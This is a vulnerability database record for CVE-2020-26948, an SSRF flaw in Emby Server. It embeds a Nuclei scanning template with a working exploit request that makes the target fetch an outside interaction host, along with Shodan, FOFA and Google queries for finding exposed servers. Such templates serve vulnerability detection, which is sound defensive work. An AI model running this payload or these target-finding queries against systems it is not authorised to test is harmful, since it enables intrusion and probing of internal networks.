{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-26948/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-26948/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-26948/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-26948/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-26948/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-26948"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-26948"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-26948.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2020-26948\n\ninfo:\n  name: Emby < 4.5.0 - Server Server-Side Request Forgery\n  author: dwisiswant0\n  severity: critical\n  description: |\n    Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.\n  impact: |\n    An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.\n  remediation: |\n    Apply the latest security patches or upgrade to a patched version of Emby Server.\n  reference:\n    - https://github.com/btnz-k/emby_ssrf\n    - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/Live-Hack-CVE/CVE-2020-26948\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-26948\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-26948\n    cwe-id: CWE-918\n    epss-score: 0.87154\n    epss-percentile: 0.99742\n    cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: emby\n    product: emby\n    shodan-query: http.title:\"emby\"\n    fofa-query: title=\"emby\"\n    google-query: intitle:\"emby\"\n  tags: cve2020,cve,emby,jellyfin,ssrf,vuln,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://oast.fun\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<h1> Interactsh Server </h1>\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n          - \"application/octet-stream\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022063688de49d8bbcfbaec43bc61739f1fcabbe7509218758cce8eb1daeb497e00402202c5d453244c807cd9f278bf494aa3bf2df6599ad148d461c1f06059adb9d17cb:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-26948"
}